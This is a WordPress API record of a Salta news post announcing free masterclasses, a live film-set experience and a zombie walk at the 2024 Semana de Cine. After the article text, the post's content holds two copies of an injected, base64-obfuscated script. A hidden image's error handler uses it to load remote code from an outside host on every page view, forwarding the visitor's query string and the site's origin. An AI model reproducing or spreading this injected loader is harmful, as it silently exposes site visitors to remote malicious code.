{"id":4156,"date":"2024-06-28T10:46:40","date_gmt":"2024-06-28T13:46:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4156"},"modified":"2025-08-13T23:53:37","modified_gmt":"2025-08-14T02:53:37","slug":"semana-del-cine-talleres-y-clases-magistrales-gratuitos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4156","title":{"rendered":"Semana del Cine: talleres y clases magistrales gratuitos"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-c6f2bdc57b6bb1c43b4f2543af9e2e82\" style=\"background-color:#4d4e4e\"><em>En 2024, la Semana de Cine en Salta celebrar\u00e1 su 28\u00ba edici\u00f3n, llev\u00e1ndo a cabo desde hoy 27 de junio al 5 de julio en diversos espacios culturales de Salta. Durante m\u00e1s de veinte a\u00f1os, esta muestra ha sido uno de los eventos culturales m\u00e1s destacados de Salta. Su objetivo es exhibir una selecci\u00f3n de cine local, nacional e internacional de calidad.<\/em><\/h5>\n\n\n\n<p>Durante la Semana del Cine las clases magistrales tambi\u00e9n continuar\u00e1n desarroll\u00e1ndose. Esta tarde a las 17&nbsp; ser\u00e1 el turno de Marcelo Pi\u00f1eyro qui\u00e9n facilitar\u00e1 \u201cReino Feroz\u201d una clase magistral a 30 a\u00f1os del estreno de Tango Feroz, la aclamada \u00f3pera prima de Pi\u00f1eyro, quien ser\u00e1 el encargado de brindar la oportunidad a los asistentes de conversar sobre su historia, su pasi\u00f3n, sus m\u00e9todos y su mirada sobre nuestros relatos.<\/p>\n\n\n\n<p>Pi\u00f1eyro, responsable de otros cl\u00e1sicos como \u201cCaballos salvajes\u201d y \u201cCenizas del para\u00edso\u201d,&nbsp;ofrecer\u00e1&nbsp;una masterclass en la Usina Cultural. Un gigante de nuestras pantallas que conoce el medio y sus posibilidades como pocos nombres locales.<\/p>\n\n\n\n<p>Ma\u00f1ana&nbsp;s\u00e1bado 29 de junio a las 17, Rodrigo de la Serna dar\u00e1 una clase magistral llamada \u201cLa actuaci\u00f3n vers\u00e1til\u201d en el SUM de la Usina Cultural, Espa\u00f1a 1-98, con entrada gratuita. En este encuentro recorreremos su historia, sus personajes y su experiencia en Argentina y Espa\u00f1a.<\/p>\n\n\n\n<p>El actor de \u201cInseparables\u201d , \u201cRevoluci\u00f3n: el cruce de los Andes\u201d y \u201cCamino a la Paz\u201d&nbsp;se referir\u00e1&nbsp;a&nbsp;sus primeros pasos, su pasi\u00f3n por contar y su carrera con el p\u00fablico. Luego de su masterclass, presentar\u00e1 en Salta su m\u00e1s reciente pel\u00edcula: \u201cEl Rapto\u201d, a la que defini\u00f3 como su \u201cmejor trabajo\u201d.<\/p>\n\n\n\n<p>Durante los d\u00edas s\u00e1bado 29 y domingo 30 de junio a partir de las 15 hasta las 19, \u201cLuz, c\u00e1mara y acci\u00f3n: Set de filmaci\u00f3n en vivo\u201d le permitir\u00e1 a los asistentes en el SUM de la Usina Cultural, Espa\u00f1a 1-98 una experiencia real de lo que se vive detr\u00e1s de c\u00e1mara. \u00bfC\u00f3mo se siente filmar una pel\u00edcula? \u00bfC\u00f3mo funciona el equipo t\u00e9cnico? \u00bfQu\u00e9 se presencia en un estudio de grabaci\u00f3n? Te invitamos a participar de nuestro set interactivo para sentirte parte del rodaje y conocer todos los secretos detr\u00e1s de c\u00e1mara.<\/p>\n\n\n\n<p>El domingo 30, se llevar\u00e1 a cabo a las 15 una Caminata Zombie y proyecci\u00f3n de \u201cLa Mujer de Piedra\u201d con entrada gratuita. La caminata zombie o \u201czombie walk\u201d es un cl\u00e1sico entre los fan\u00e1ticos del g\u00e9nero, invitamos al p\u00fablico en general a venir disfrazados\/as de \u201cmuertos\/as vivientes\u201d. La cita es en la Casa de la&nbsp;Cultura donde tambi\u00e9n se encontrar\u00e1n los maquilladores de la Semana de Cine demostrando su talento para hacer efectos especiales en algunos participantes. La caminata atravesar\u00e1 las calles del microcentro hasta llegar a la Usina Cultural, donde se podr\u00e1 disfrutar de la proyecci\u00f3n de \u201cLa Mujer de Piedra\u201d a las 19 en el parque de la Usina Cultural.&nbsp; Se trata de una edici\u00f3n especial de la serie salte\u00f1a dirigida por Noelia Carrizo D\u2019Alessandro, para destacar el talento y amor por el g\u00e9nero \u201czombie\u201d.<\/p>\n\n\n\n<p>Para mayor informaci\u00f3n sobre las actividades previstas &nbsp;ingresa a SALTA CINE&nbsp;<a href=\"https:\/\/saltacine.gob.ar\/2024\/\">https:\/\/saltacine.gob.ar\/2024\/<\/a><\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Semana del Cine: talleres y clases magistrales gratuitos\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/HgnAz0iQ2zA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En 2024, la Semana de Cine en Salta celebrar\u00e1 su 28\u00ba edici\u00f3n, llev\u00e1ndo a cabo desde hoy 27 de junio al 5 de julio en diversos espacios culturales de Salta. Durante m\u00e1s de veinte a\u00f1os, esta muestra ha sido uno de los eventos culturales m\u00e1s destacados de Salta. Su objetivo es exhibir una selecci\u00f3n de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4157,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[23],"tags":[],"class_list":{"0":"post-4156","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-audio-visuales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4156"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4156"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4156\/revisions"}],"predecessor-version":[{"id":6753,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4156\/revisions\/6753"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4157"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}